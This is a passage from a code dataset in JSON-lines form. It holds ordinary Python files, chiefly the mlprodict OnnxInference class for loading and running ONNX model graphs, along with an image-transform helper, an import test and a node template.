channels.\n\n Returns:\n ndarray: the transformed image\n TransformList: contain the transforms that's used.\n \"\"\"\n for g in transform_gens:\n assert isinstance(g, TransformGen), g\n\n check_dtype(img)\n\n tfms = []\n for g in transform_gens:\n tfm = g.get_transform(img)\n assert isinstance(\n tfm, Transform\n ), \"TransformGen {} must return an instance of Transform! Got {} instead\".format(g, tfm)\n img = tfm.apply_image(img)\n tfms.append(tfm)\n return img, TransformList(tfms)\n"} {"ext": "py", "sha": "1a30f55afc55ffd9d76cc7cffb4a3b2c47ee0a06", "content": "def independence():\n # Simply check that extensions can be imported. This is run in a test\n # flagged as \"local\" since we want extensions to be possible to import in\n # standalone unit tests.\n #\n # Nothing in extensions can actually be used, of course, but that's not a\n # problem; the unit tests simply need to make sure not to depend on that.\n\n import extensions\n\n print \"independence: ok\"\n"} {"ext": "py", "sha": "1a30f7e940e9bfb29cf40041df665831c84cc02d", "content": "from custom_src.NodeInstance import NodeInstance\nfrom custom_src.Node import Node\n\n\n# USEFUL\n# self.input(index) <- access to input data\n# self.outputs[index].set_val(val) <- set output data port value\n# self.main_widget <- access to main widget\n# self.exec_output(index) <- executes an execution output\n# self.create_new_input(type_, label, append=True, widget_type='', widget_name='', widget_pos='under')\n# self.delete_input(input or index)\n# self.create_new_output(type_, label, append=True)\n# self.delete_output(output or index)\n# self.update_shape()\n\n\nclass %NODE_TITLE%_NodeInstance(NodeInstance):\n def __init__(self, parent_node: Node, flow, configuration=None):\n super(%NODE_TITLE%_NodeInstance, self).__init__(parent_node, flow, configuration)\n\n self.initialized()\n\n\n def update_event(self, input_called=-1):\n if input_called == 0:\n while(self.input(1)):\n self.exec_output(0)\n\n def get_data(self):\n data = {}\n # ...\n return data\n\n def set_data(self, data):\n pass\n # ...\n\n\n\n # optional - important for threading - stop everything here\n def removing(self):\n pass\n"} {"ext": "py", "sha": "1a30fa90bed29cfd4968dd1a9d15b59b9ffad0ab", "content": "# pylint: disable=C0302\n\"\"\"\n@file\n@brief Implements a class able to compute the predictions\nfrom on an :epkg:`ONNX` model.\n\"\"\"\nfrom collections import OrderedDict\nfrom io import BytesIO\nfrom time import perf_counter\nimport warnings\nimport textwrap\nimport pprint\nimport numpy\nfrom scipy.sparse import coo_matrix\nfrom onnx import load, load_model, checker, shape_inference\nfrom onnx import onnx_pb as onnx_proto\nfrom onnx.helper import make_model\nfrom ..tools.code_helper import make_callable, print_code\nfrom ..onnx_tools.onnx2py_helper import (\n _var_as_dict, numpy_min, numpy_max, guess_numpy_type_from_string)\nfrom ..onnx_tools.onnx_manipulations import (\n select_model_inputs_outputs, enumerate_model_node_outputs,\n overwrite_opset, insert_results_into_onnx)\nfrom ..onnx_tools.optim import onnx_remove_node_unused\nfrom .onnx_inference_node import OnnxInferenceNode\nfrom .onnx_inference_exports import OnnxInferenceExport\nfrom .shape_object import ShapeObject\nfrom .type_object import SequenceType\n\n\nclass OnnxInference:\n \"\"\"\n Loads an :epkg:`ONNX` file or object or stream.\n Computes the output of the :epkg:`ONNX` graph.\n Several runtimes are available.\n\n * ``'python'``: the runtime implements every onnx operator\n needed to run a :epkg:`scikit-learn` model by using :epkg:`numpy`\n or C++ code.\n * ``'python_compiled'``: it is the same runtime than the previous\n one except every operator is called from a compiled function\n (@see me _build_compile_run) instead for a method going through\n the list of operator\n * ``'onnxruntime1'``: uses :epkg:`onnxruntime`\n * ``'onnxruntime2'``: this mode is mostly used to debug as\n python handles calling every operator but :epkg:`onnxruntime`\n is called for every of them, this process may fail due to\n wrong inference type specially of the graph includes\n custom nodes, in that case, it is better to compute the output\n of intermediates nodes. It is much slower as fo every output, every\n node is computed but more robust.\n\n :param onnx_or_bytes_or_stream: :epkg:`onnx` object,\n bytes, or filename or stream\n :param runtime: runtime options\n :param skip_run: do not build the runtime\n :param inplace: use inplace computation as much as possible\n :param input_inplace: the computation is allowed\n to overwrite the input, see :meth:`_guess_inplace\n <mlprodict.onnxrt.onnx_inference.OnnxInference._guess_inplace>`\n :param ir_version: if not None, overwrite the default version\n :param target_opset: used to overwrite *target_opset*\n :param runtime_options: specific options for the runtime\n :param inside_loop: tells the runtime the graph is meant to\n be repeated multiple times (in that case, inputs and\n outputs may share the same name)\n :param static_inputs: Loop can use static variables,\n variables from the graph which runs the loop\n (enumerate of strings)\n :param new_outputs: if the loading fails, it might worth\n cutting the graph, if not None, the graph will\n be cut to have these new_outputs as the final outputs\n :param new_opset: overwrite the main opset and replaces\n by this new one\n :param device: device, a string `cpu`, `cuda`, `cuda:0`...,\n this option is only available with runtime *onnxruntime1*\n\n Among the possible runtime_options, there are:\n * *enable_profiling*: enables profiling for :epkg:`onnxruntime`\n * *session_options*: an instance of *SessionOptions* from\n :epkg:`onnxruntime`\n * *ir_version*: change ir_version\n\n .. versionchanged:: 0.7\n Parameters *new_outputs*, *new_opset* were added.\n\n .. versionchanged:: 0.8\n Parameters *static_inputs*, *device* were added.\n \"\"\"\n\n def __init__(self, onnx_or_bytes_or_stream, runtime=None,\n skip_run=False, inplace=True,\n input_inplace=False, ir_version=None,\n target_opset=None, runtime_options=None,\n session_options=None, inside_loop=False,\n static_inputs=None, new_outputs=None, new_opset=None,\n device=None):\n if isinstance(onnx_or_bytes_or_stream, bytes):\n self.obj = load_model(BytesIO(onnx_or_bytes_or_stream))\n elif isinstance(onnx_or_bytes_or_stream, BytesIO):\n self.obj = load_model(onnx_or_bytes_or_stream)\n elif isinstance(onnx_or_bytes_or_stream, str):\n self.obj = load(onnx_or_bytes_or_stream)\n elif hasattr(onnx_or_bytes_or_stream, 'graph'):\n self.obj = onnx_or_bytes_or_stream\n elif isinstance(onnx_or_bytes_or_stream, onnx_proto.GraphProto):\n self.obj = make_model(onnx_or_bytes_or_stream,\n producer_name='mlprodict')\n else:\n raise TypeError(\"Unable to handle type {}.\".format( # pragma: no cover\n type(onnx_or_bytes_or_stream)))\n if ir_version is not None:\n self.obj.ir_version = ir_version\n if new_outputs is not None:\n self.obj = select_model_inputs_outputs(\n self.obj, outputs=new_outputs, infer_shapes=True)\n if new_opset is not None:\n self.obj = overwrite_opset(self.obj, new_opset)\n if device is not None and runtime != 'onnxruntime1':\n raise ValueError(\n \"Incompatible values, device can be specified with \"\n \"runtime 'onnxruntime1', not %r.\" % runtime)\n\n self.runtime = runtime\n self.skip_run = skip_run\n self.input_inplace = input_inplace\n self.inplace = inplace\n self.force_target_opset = target_opset\n self.runtime_options = runtime_options\n self.inside_loop = inside_loop\n self.static_inputs = static_inputs\n self.device = device\n self._init()\n\n def __getstate__(self):\n \"\"\"\n To pickle the object.\n \"\"\"\n return {'onnx': self.obj.SerializeToString(),\n 'runtime': self.runtime,\n 'runtime_options': self.runtime_options,\n 'skip_run': self.skip_run,\n 'input_inplace': self.input_inplace,\n 'inplace': self.inplace,\n 'force_target_opset': self.force_target_opset,\n 'static_inputs': self.static_inputs,\n 'inside_loop': self.inside_loop,\n 'device': self.device}\n\n def __setstate__(self, state):\n \"\"\"\n To unpickle the object.\n \"\"\"\n onx = state['onnx']\n self.obj = load_model(BytesIO(onx))\n self.runtime = state['runtime']\n self.runtime_options = state['runtime_options']\n self.skip_run = state['skip_run']\n self.input_inplace = state['input_inplace']\n self.inplace = state['inplace']\n self.force_target_opset = state['force_target_opset']\n self.static_inputs = state['static_inputs']\n self.inside_loop = state['inside_loop']\n self.device = state['device']\n self._init()\n\n def _init(self):\n \"\"\"\n Prepares the instance to deliver predictions.\n \"\"\"\n self.graph_ = self.to_sequence()\n if len(self.graph_['sequence']) == 0:\n raise RuntimeError( # pragma: no cover\n \"No runnable nodes was found in the ONNX graph.\")\n self.outputs_ = self.graph_['outputs']\n self.inputs_ = self.graph_['inputs']\n\n for ino in [self.obj.graph.input, self.obj.graph.output]:\n for xy in ino:\n shape = xy.type.tensor_type.shape\n for d in shape.dim:\n if d.dim_value == 0 and \"0\" in str(d) and 'dim_param' not in str(d):\n # d.dim_value returns 0 whether is is 0 or empty.\n # it may be a parameter as well\n raise RuntimeError( # pragma: no cover\n \"Wrong ONNX file, one input or output has an empty shape: \"\n \"{}.\".format(xy))\n\n self.target_opset_ = self.graph_['targets']\n if self.force_target_opset is not None:\n if isinstance(self.force_target_opset, dict):\n self.target_opset_ = self.force_target_opset # pragma: no cover\n else:\n self.target_opset_ = {'': self.force_target_opset}\n self.ir_version_ = self.graph_['ir_version']\n\n if not self.skip_run:\n if self.runtime == 'onnxruntime1':\n # Loads the onnx with onnxruntime as a single file.\n del self.graph_\n from .ops_whole.session import OnnxWholeSession\n self._whole = OnnxWholeSession(\n self.obj, self.runtime, self.runtime_options,\n self.device)\n self._run = self._run_whole_runtime\n else:\n self.sequence_ = self.graph_['sequence']\n self.inits_ = self.graph_['inits']\n self.statics_ = self.graph_['statics']\n dtype = self._guess_input_dtype()\n variables = self.inits_.copy()\n for node in self.sequence_:\n domain = node.onnx_node.domain\n target_opset = self.target_opset_.get(domain, None)\n if self.runtime in ('onnxruntime2', 'empty'):\n node.setup_runtime(self.runtime, variables, self.__class__,\n target_opset=target_opset, dtype=dtype,\n domain=domain, ir_version=self.ir_version_,\n runtime_options=self.runtime_options)\n else:\n node.setup_runtime(self.runtime, variables, self.__class__,\n target_opset=target_opset, domain=domain,\n ir_version=self.ir_version_,\n runtime_options=self.runtime_options)\n if hasattr(node, 'ops_') and hasattr(node.ops_, 'typed_outputs_'):\n for k, v in node.ops_.typed_outputs_:\n variables[k] = v\n self._run = self._run_sequence_runtime\n\n if not self.skip_run and self.runtime in ('python', None):\n self.shapes_ = self._set_shape_inference_runtime()\n if self.inplace:\n self.inplaces_ = self._guess_inplace(self.input_inplace)\n self.exporters_ = OnnxInferenceExport(self)\n self.to_json = self.exporters_.to_json\n self.to_dot = self.exporters_.to_dot\n self.to_python = self.exporters_.to_python\n self.to_text = self.exporters_.to_text\n self.to_onnx_code = self.exporters_.to_onnx_code\n\n if self.runtime in ('python_compiled', 'python_compiled_debug'):\n # switch the inference method to the compiled one\n _, fct, code = self._build_compile_run('debug' in self.runtime)\n setattr(self, '_run_compiled', fct)\n setattr(self, '_run_compiled_code', code)\n self._run = self._run_sequence_runtime_compiled\n\n def _run_sequence_runtime_compiled(\n self, inputs, clean_right_away=False, intermediate=False,\n verbose=0, node_time=False, yield_ops=None, fLOG=None):\n \"\"\"\n Executes a compiled version of @see me _run_sequence_runtime,\n compiled with method @see me _build_compile_run.\n Every parameter with a default value is ignored.\n Switch to ``runtime='python'`` to enable those.\n \"\"\"\n try:\n return self._run_compiled( # pylint: disable=E1101\n inputs, yield_ops=yield_ops)\n except NameError as e:\n raise RuntimeError( # pragma: no cover\n \"Unable to compute prediction due to %r. Code:\\n%s\"\n \"\" % (e, print_code(\n self._run_compiled_code))) from e # pylint: disable=E1101\n\n def _guess_input_dtype(self):\n for _, v in self.graph_['inputs'].items():\n if 'type' not in v:\n continue # pragma: no cover\n t = v['type']\n if 'elem' not in t:\n continue\n if t['elem'] == 'double':\n return numpy.float64\n return numpy.float32\n\n def __str__(self):\n \"\"\"\n usual\n \"\"\"\n rows = ['OnnxInference(...)']\n if hasattr(self, '_run_compiled_code'):\n rows.append(\n textwrap.indent(\n self._run_compiled_code, ' ')) # pylint: disable=E1101\n else:\n rows.append(textwrap.indent(str(self.obj), ' '))\n return \"\\n\".join(rows)\n\n def __repr__(self):\n \"\"\"\n usual\n \"\"\"\n return \"OnnxInference(...)\" # pragma: no cover\n\n def check_model(self):\n \"\"\"\n Checks the model follow :epkg:`ONNX` conventions.\n \"\"\"\n checker.check_model(self.obj)\n\n def shape_inference(self):\n \"\"\"\n Infers the shape of the outputs\n with :epkg:`onnx` package.\n\n @return A new :epkg:`ONNX` graph which defined outputs.\n \"\"\"\n return shape_inference.infer_shapes(self.obj)\n\n @property\n def input_names(self):\n \"\"\"\n Returns the names of all inputs.\n It does not include the optional inputs.\n\n .. versionchanged:: 0.6\n The list does not include optional inputs anymore.\n \"\"\"\n inits = set(_.name for _ in self.obj.graph.initializer)\n return [_.name for _ in self.obj.graph.input if _.name not in inits]\n\n @property\n def input_names_shapes(self):\n \"\"\"\n Returns the names and shapes of all inputs.\n This method assumes all inputs are tensors.\n It does not include the optional inputs.\n\n .. versionchanged:: 0.6\n The list does not include optional inputs anymore.\n \"\"\"\n names = set(self.input_names)\n return [(_.name, _var_as_dict(_)['type']['shape'])\n for _ in self.obj.graph.input if _.name in names]\n\n @staticmethod\n def _get_type_property(info, prop):\n if prop in info:\n return info[prop]\n if 'kind' in info and info['kind'] == 'sequence':\n if prop == 'shape':\n return ('?', )\n raise NotImplementedError(\n \"Unable to retrieve property %r from %r.\"\n \"\" % (prop, info))\n\n @property\n def input_names_shapes_types(self):\n \"\"\"\n Returns the names, shapes, types of all inputs.\n This method assumes all inputs are tensors.\n It does not include the optional inputs.\n\n .. versionchanged:: 0.6\n The list does not include optional inputs anymore.\n \"\"\"\n f = OnnxInference._get_type_property\n names = set(self.input_names)\n return [(_.name, f(_var_as_dict(_)['type'], 'shape'),\n 'tensor(%s)' % f(_var_as_dict(_)['type'], 'elem'))\n for _ in self.obj.graph.input if _.name in names]\n\n @property\n def output_names(self):\n \"\"\"\n Returns the names of all outputs.\n \"\"\"\n return [_.name for _ in self.obj.graph.output]\n\n @property\n def output_names_shapes(self):\n \"\"\"\n Returns the names and shapes of all outputs.\n This method assumes all inputs are tensors.\n \"\"\"\n f = OnnxInference._get_type_property\n return [(_.name, f(_var_as_dict(_)['type'], 'shape'))\n for _ in self.obj.graph.output]\n\n @property\n def output_names_shapes_types(self):\n \"\"\"\n Returns the names, shapes, types of all outputs.\n This method assumes all inputs are tensors.\n It does not include the optional outputs.\n\n .. versionadd:: 0.7\n \"\"\"\n names = set(self.output_names)\n f = OnnxInference._get_type_property\n return [(_.name, f(_var_as_dict(_)['type'], 'shape'),\n 'tensor(%s)' % f(_var_as_dict(_)['type'], 'elem'))\n for _ in self.obj.graph.output if _.name in names]\n\n def global_index(self, name):\n \"\"\"\n Maps every name to one integer to avoid using dictionaries\n when running the predictions.\n\n @param name outputs name\n @return integer\n \"\"\"\n if not hasattr(self, '_global_index'):\n self._global_index = {}\n if name in self._global_index:\n return self._global_index[name]\n self._global_index[name] = len(self._global_index)\n return self._global_index[name]\n\n def to_sequence(self):\n \"\"\"\n Produces a graph to facilitate the execution.\n\n One example:\n\n .. exref::\n :title: Convert ONNX into graph\n\n An example on how to convert an :epkg:`ONNX`\n graph into a graph.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n import pprint\n import numpy\n from skl2onnx.algebra.onnx_ops import OnnxLinearRegressor\n from skl2onnx.common.data_types import FloatTensorType\n from mlprodict.onnxrt import OnnxInference\n\n pars = dict(coefficients=numpy.array([1., 2.]),\n intercepts=numpy.array([1.]),\n post_transform='NONE')\n onx = OnnxLinearRegressor('X', output_names=['Y'], **pars)\n model_def = onx.to_onnx({'X': pars['coefficients'].astype(numpy.float32)},\n outputs=[('Y', FloatTensorType([1]))],\n target_opset=12)\n oinf = OnnxInference(model_def)\n pprint.pprint(oinf.to_sequence())\n\n See an example of representation in notebook\n :ref:`onnxvisualizationrst`.\n \"\"\"\n inits = {}\n variables = {}\n outputs = {}\n nodes = {}\n statics = {}\n targets = {}\n for o in self.obj.opset_import:\n targets[o.domain] = o.version\n\n # static variables\n if self.static_inputs is not None:\n for n in self.static_inputs:\n statics[n] = {'name': n}\n self.global_index(n)\n\n # inputs\n for obj in self.obj.graph.input:\n variables[obj.name] = _var_as_dict(obj)\n self.global_index(obj.name)\n\n # outputs\n for obj in self.obj.graph.output:\n if hasattr(obj, 'type') and str(obj.type) != '':\n outputs[obj.name] = _var_as_dict(obj)\n else:\n outputs[obj.name] = {'name': obj.name}\n self.global_index(obj.name)\n\n # initializer\n for obj in self.obj.graph.initializer:\n init_obj = _var_as_dict(obj)\n if init_obj is None:\n raise RuntimeError( # pragma: no cover\n \"Unable to convert an initializer\\n{}\".format(obj))\n inits[obj.name] = init_obj\n self.global_index(obj.name)\n if 'value' not in inits[obj.name]:\n raise RuntimeError( # pragma: no cover\n \"One initializer has no value: '{}'\\n{}\\n{}\".format(\n obj.name, inits[obj.name], obj))\n\n # nodes\n for node in self.obj.graph.node:\n dobj = _var_as_dict(node)\n if dobj is None:\n raise RuntimeError( # pragma: no cover\n \"Unable to convert a node\\n{}\".format(node))\n if 'atts' in dobj:\n atts = dobj['atts']\n for k, v in atts.items():\n if not isinstance(v, dict) or 'value' not in v:\n raise RuntimeError( # pragma: no cover\n \"A parameter has no (sparse) value '{}' \"\n \"for node '{}'\\nv={}\\ndobj=[{}]\".format(\n k, node.name, v, node))\n if node.name in nodes: # pragma: no cover\n i = 2\n while True:\n new_name = \"%s_n%i\" % (node.name, i)\n if new_name not in nodes:\n break\n i += 1\n else:\n new_name = node.name\n nodes[new_name] = OnnxInferenceNode(node, dobj, self.global_index)\n\n # names\n names = {}\n for k, v in statics.items():\n if (k, 0) in names:\n raise RuntimeError( # pragma: no cover\n \"Static variables '{}' already exists (tag='{}').\".format(\n k, names[k, 0][0]))\n names[k, 0] = ('S', v)\n for k, v in inits.items():\n if (k, 0) in names:\n raise RuntimeError( # pragma: no cover\n \"Initializer '{}' already exists (tag='{}').\".format(\n k, names[k, 0][0]))\n names[k, 0] = ('C', v)\n for k, v in variables.items():\n if (k, 0) in names:\n if k in inits:\n # Kind of default value for an input\n continue\n raise RuntimeError( # pragma: no cover\n \"Variable '{}' already exists (tag='{}').\".format(\n k, names[k, 0][0]))\n names[k, 0] = ('I', v)\n for k, v in outputs.items():\n if (k, 0) in names and self.runtime != 'empty':\n if not self.inside_loop or names[k, 0][0] != 'I':\n raise RuntimeError( # pragma: no cover\n \"Output '{}' already exists (tag='{}').\".format(\n k, names[k, 0][0]))\n else:\n # For input, output sharing the same name, we marked the name\n # as an input.\n continue\n names[k, 0] = ('O', v)\n for k, v in nodes.items():\n if (k, 1) in names:\n raise RuntimeError( # pragma: no cover\n \"Node '{}' already exists (tag='{}'). \"\n \"Use inside_loop=True to bypass this exception.\".format(\n k, names[k, 0][0]))\n names[k, 1] = ('N', v)\n\n # ordering\n order = {}\n modif = 1\n intermediate = {}\n while modif > 0:\n modif = 0\n for (k, _), v in names.items():\n if (k, 1) in order:\n # The operator node is already processed.\n continue\n if v[0] in {'I', 'C', 'S'}:\n if (k, 0) not in order:\n order[k, 0] = len(order) # A data node.\n modif += 1\n continue\n if v[0] == 'O':\n continue\n if all((inp, 0) in order for inp in v[1].inputs):\n # If all inputs are available,\n # We tell the operator node is processed.\n order[k, 1] = len(order)\n modif += 1\n for o in v[1].outputs:\n if (o, 0) in order:\n raise RuntimeError( # pragma: no cover\n \"Two nodes share the same output '{}' \"\n \"or an operator and an output \"\n \"share the same name. \"\n \"(node: {}).\".format(o, v[1]))\n # We add a data node.\n order[o, 0] = len(order)\n intermediate[o] = None\n modif += 1\n\n # compute\n rev = [(v, k[0], k[1]) for k, v in order.items()]\n rev.sort()\n sequence = []\n for _, name, node_kind in rev:\n if name not in nodes:\n continue\n if node_kind == 0:\n # It is an output which shares the same name\n # as a node.\n continue\n node = nodes[name]\n node.set_order(len(sequence))\n sequence.append(node)\n\n if len(sequence) == 0:\n raise RuntimeError( # pragma: no cover\n \"No runnable nodes was found in the ONNX graph\"\n \"\\n--rev--\\n{}\"\n \"\\n--order--\\n{}\"\n \"\\n--nodes--\\n{}\"\n \"\\n---\".format(\n \"\\n\".join([str(_) for _ in names.items()]),\n \"\\n\".join([str(_) for _ in order.items()]),\n \"\\n\".join([str(_) for _ in nodes.items()])))\n\n # defines where an intermediare output is not needed\n last_used = {}\n for node in sequence:\n for inp in node.inputs:\n last_used[inp] = node.order\n for k, ord in last_used.items():\n sequence[ord].add_variable_to_clean(k)\n\n results = dict(inits=inits, inputs=variables, outputs=outputs,\n nodes=nodes, sequence=sequence,\n intermediate=intermediate,\n targets=targets, ir_version=self.obj.ir_version,\n statics=statics)\n if len(sequence) < len(nodes):\n # Not all node will be executed.\n raise RuntimeError( # pragma: no cover\n \"Unable to run all nodes.\\n--Nodes--\\n%s\\n--Sequence--\\n%s\"\n \"\\n--Inputs--\\n%s\\n--Inits--\\n%s\\n--Statics\\n%s\"\n \"\" % (pprint.pformat(nodes), pprint.pformat(sequence),\n pprint.pformat(list(variables)),\n pprint.pformat(list(inits)),\n pprint.pformat(list(statics))))\n return results\n\n def run(self, inputs, clean_right_away=False,\n intermediate=False, verbose=0, node_time=False,\n overwrite_types=None, yield_ops=None, fLOG=None):\n \"\"\"\n Computes the predictions for this :epkg:`onnx` graph.\n\n :param inputs: inputs as dictionary or a dataframe\n :param clean_right_away: clean the intermediate outputs\n as soon as they are not needed\n :param intermediate: returns a dictionary of intermediate\n variables instead of the results only\n :param verbose: display information while predicting\n :param node_time: measure time of each node\n :param overwrite_types: shape inference does not work all the time,\n this allows to force types when building intermediate\n results, see @see fn select_model_inputs_outputs\n :param yield_ops: dictionary to overwrite the output of\n operator *YieldOp*\n :param fLOG: logging function if *verbose > 0*\n :return: outputs as dictionary\n and a second dictionary of the time spent\n in each node if *node_time* is True\n\n .. exref::\n :title: Computes predictions with any runtime\n\n The following example compares predictions\n between :epkg:`scikit-learn` and this runtime\n for the python runtime.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n import numpy\n from sklearn.linear_model import LinearRegression\n from sklearn.datasets import load_iris\n from sklearn.model_selection import train_test_split\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.onnx_conv import to_onnx\n\n iris = load_iris()\n X, y = iris.data, iris.target\n X_train, X_test, y_train, _ = train_test_split(X, y)\n clr = LinearRegression()\n clr.fit(X_train, y_train)\n\n exp = clr.predict(X_test[:5])\n print(exp)\n\n model_def = to_onnx(clr, X_train.astype(numpy.float32),\n target_opset=12)\n oinf = OnnxInference(model_def)\n y = oinf.run({'X': X_test[:5]})\n print(y)\n\n The function returns all intermediate outputs\n if *intermediate* is True. In case of runtime\n *onnxruntime1*, if intermediate is True,\n the first class builds all :epkg:`ONNX` cut out\n to keep the one output and converted into\n *OnnxInference*.\n\n .. versionchanged:: 0.8\n Parameter *yield_ops* was added.\n \"\"\"\n def retype(col_array):\n if (hasattr(col_array, 'categories') and\n hasattr(col_array, 'from_codes')):\n # isinstance(col_array, pandas.Categorical):\n return col_array.astype(numpy.int64)\n return col_array\n\n if hasattr(inputs, 'columns') and hasattr(inputs, 'iloc'):\n # == isinstance(inputs, pandas.DataFrame)\n inputs = OrderedDict((\n name, retype(numpy.expand_dims(inputs[name].values, axis=1)))\n for name in inputs.columns)\n if intermediate:\n if self.inplace:\n raise RuntimeError( # pragma: no cover\n \"inplace must be False if intermediate is True, a container \"\n \"might be used by several nodes.\")\n return self._run(inputs, clean_right_away=False,\n intermediate=intermediate,\n verbose=verbose, node_time=node_time,\n overwrite_types=overwrite_types,\n yield_ops=yield_ops, fLOG=fLOG)\n if overwrite_types is not None:\n raise RuntimeError( # pragma: no cover\n \"overwrite_types is not used if intermediate is False.\")\n return self._run(inputs, clean_right_away=False,\n intermediate=intermediate,\n verbose=verbose, node_time=node_time,\n yield_ops=yield_ops, fLOG=fLOG)\n\n def run2onnx(self, inputs, verbose=0, fLOG=None,\n as_parameter=True, suffix='_DBG',\n param_name=None, node_type='DEBUG',\n domain='DEBUG', domain_opset=1):\n \"\"\"\n Executes the graphs with the given inputs, then adds the intermediate\n results into ONNX nodes in the original graph. Once saved, it can be\n looked with a tool such as :epkg:`netron`.\n\n :param inputs: inputs as dictionary or a dataframe\n :param verbose: display information while predicting\n :param fLOG: logging function if *verbose > 0*\n :param as_parameter: add new nodes with results as one parameter\n (True) or as initializer (False)\n :param suffix: suffix to add to new results\n :param param_name: name of the parameter to add\n (by default the result name), it can be a function\n `param_name(reult_name) -> parameter_name`\n :param node_type: type of the new node\n :param domain: domain the new node\n :param domain_opset: opset for *domain*\n :return: outputs as dictionary\n and the onnx graph with new nodes\n\n The following example shows how to use it.\n\n .. gdot::\n :script: DOT-SECTION\n\n from sklearn.linear_model import LinearRegression\n from sklearn.datasets import load_iris\n from mlprodict.onnxrt import OnnxInference\n import numpy\n\n iris = load_iris()\n X = iris.data[:, :2]\n y = iris.target\n lr = LinearRegression()\n lr.fit(X, y)\n\n from mlprodict.onnx_conv import to_onnx\n model_onnx = to_onnx(lr, X.astype(numpy.float32))\n oinf = OnnxInference(model_onnx, inplace=False)\n\n model_onnx_debug = oinf.run2onnx({'X': X[:3].astype(numpy.float32)})\n oinf_debug = OnnxInference(model_onnx_debug[1])\n\n print(\"DOT-SECTION\", oinf_debug.to_dot())\n\n .. versionadded:: 0.7\n \"\"\"\n intermediate = self.run(inputs, verbose=verbose, fLOG=fLOG,\n intermediate=True)\n for name in self.input_names:\n del intermediate[name]\n new_onx = insert_results_into_onnx(\n self.obj, intermediate, as_parameter=as_parameter,\n suffix=suffix, param_name=param_name, node_type=node_type,\n domain=domain, domain_opset=domain_opset)\n return intermediate, new_onx\n\n def display_sequence(self, verbose=1):\n \"\"\"\n Shows the sequence of nodes to run if ``runtime=='python'``.\n \"\"\"\n rows = []\n rows.append(\"#node: {}\".format(len(self.sequence_)))\n for i, node in enumerate(self.sequence_):\n if verbose >= 1:\n rows.append(\"{}: {}\".format(i, str(node)))\n return \"\\n\".join(rows)\n\n def _run_sequence_runtime(self, inputs, clean_right_away=False,\n intermediate=False, verbose=0, node_time=False,\n overwrite_types=None, yield_ops=None,\n fLOG=None):\n if overwrite_types is not None:\n raise NotImplementedError( # pragma: no cover\n \"overwrite_types != None not implemented.\")\n if clean_right_away:\n raise NotImplementedError( # pragma: no cover\n \"clean_right_away=true not implemented.\")\n\n if node_time:\n mtime = []\n if verbose >= 1 and fLOG is not None:\n printed = set()\n\n if hasattr(self, \"_values_init\"):\n values = self._values_init.copy() # pylint: disable=E0203\n else:\n values = [None] * len(self._global_index)\n if verbose >= 1 and fLOG is not None:\n for k, v in self.inits_.items():\n values[self._global_index[k]] = v['value']\n if verbose < 3:\n fLOG(\"+ki='{}': {} (dtype={} min={} max={})\".format(\n k, v['value'].shape, v['value'].dtype,\n numpy_min(v['value']), numpy_max(v['value'])))\n else:\n fLOG(\"+ki='{}': {} (dtype={} min={} max={}\\n{}\".format(\n k, v['value'].shape, v['value'].dtype,\n numpy_min(v['value']), numpy_max(v['value']),\n v['value']))\n printed.add(k)\n else:\n for k, v in self.inits_.items():\n values[self._global_index[k]] = v['value']\n # stores the array to skip initialing a second time\n if verbose == 0 or fLOG is None:\n self._values_init = values.copy()\n\n for name, value in inputs.items():\n values[self._global_index[name]] = value\n\n if verbose == 0 or fLOG is None:\n if node_time:\n for i, node in enumerate(self.sequence_):\n if yield_ops is not None and node.onnx_node.op_type == 'YieldOp':\n out = node.onnx_node.output[0]\n if out in yield_ops:\n values[out] = yield_ops[out]\n continue\n raise RuntimeError( # pragma: no cover\n \"YieldOp output %r could not be found in \"\n \"yield_ops: %r (node=%r).\" % (\n out, list(sorted(yield_ops)), node.onnx_node))\n t = perf_counter()\n node.run(values)\n t2 = perf_counter()\n mtime.append(dict(i=i, name=node.onnx_node.name,\n op_type=node.onnx_node.op_type,\n time=t2 - t))\n else:\n for node in self.sequence_:\n node.run(values)\n else:\n def dispsimple(arr):\n if hasattr(arr, 'shape'):\n if len(arr.shape) <= 1:\n threshold = 8\n else:\n threshold = min(\n 50, min(50 // max(arr.shape[1], 1), 8) * arr.shape[1])\n if hasattr(arr, 'todense'):\n fLOG( # pragma: no cover\n numpy.array2string(arr.todense(), max_line_width=120,\n suppress_small=True, threshold=threshold))\n else:\n fLOG(numpy.array2string(arr, max_line_width=120,\n suppress_small=True,\n threshold=threshold))\n else: # pragma: no cover\n s = str(arr)\n if len(s) > 50:\n s = s[:50] + \"...\"\n fLOG(s)\n\n if verbose >= 2:\n for k in sorted(self._global_index):\n if values[self._global_index[k]] is None:\n continue\n obj = values[self._global_index[k]]\n if k not in printed:\n printed.add(k)\n if hasattr(obj, 'shape'):\n fLOG(\"-kv='{}' shape={} dtype={} min={} max={}{}\".format(\n k, obj.shape, obj.dtype, numpy_min(obj),\n numpy_max(obj),\n ' (sparse)' if isinstance(obj, coo_matrix) else ''))\n elif (isinstance(obj, list) and len(obj) > 0 and\n not isinstance(obj[0], dict)): # pragma: no cover\n fLOG(\"-kv='{}' list len={}\".format(k, len(obj)))\n if verbose >= 3 and len(obj) > 0:\n fLOG(\"first={} last={}\".format(\n obj[0], obj[-1]))\n else: # pragma: no cover\n fLOG(\"-kv='{}' type={}\".format(k, type(obj)))\n\n keys = set(k for k in range(len(values)) if values[k] is not None)\n if verbose >= 1:\n fLOG(\"-- OnnxInference: run {} nodes\".format(len(self.sequence_)))\n for i, node in enumerate(self.sequence_):\n if verbose >= 1:\n fLOG(node)\n if yield_ops is not None and node.onnx_node.op_type == 'YieldOp':\n out = node.onnx_node.output[0]\n if out in yield_ops:\n fLOG(\"+yo=%r\" % out)\n values[node.outputs_indices[0]] = yield_ops[out]\n else:\n raise RuntimeError( # pragma: no cover\n \"YieldOp output %r could not be found in \"\n \"yield_ops: %r (node=%r).\" % (\n out, list(sorted(yield_ops)), node.onnx_node))\n elif node_time:\n t = perf_counter()\n node.run(values)\n t2 = perf_counter()\n mtime.append(dict(i=i, name=node.onnx_node.name,\n op_type=node.onnx_node.op_type,\n time=t2 - t))\n else:\n node.run(values)\n added = 0\n for k in range(len(values)): # pylint: disable=C0200\n if values[k] is None:\n continue\n if k not in keys and k not in printed:\n added += 1\n printed.add(k)\n name = list(\n name for name in self._global_index # pylint: disable=C0206\n if self._global_index[name] == k)\n if isinstance(values[k], (numpy.ndarray, coo_matrix)):\n name = name[0]\n mini = numpy_min(values[k])\n maxi = numpy_max(values[k])\n 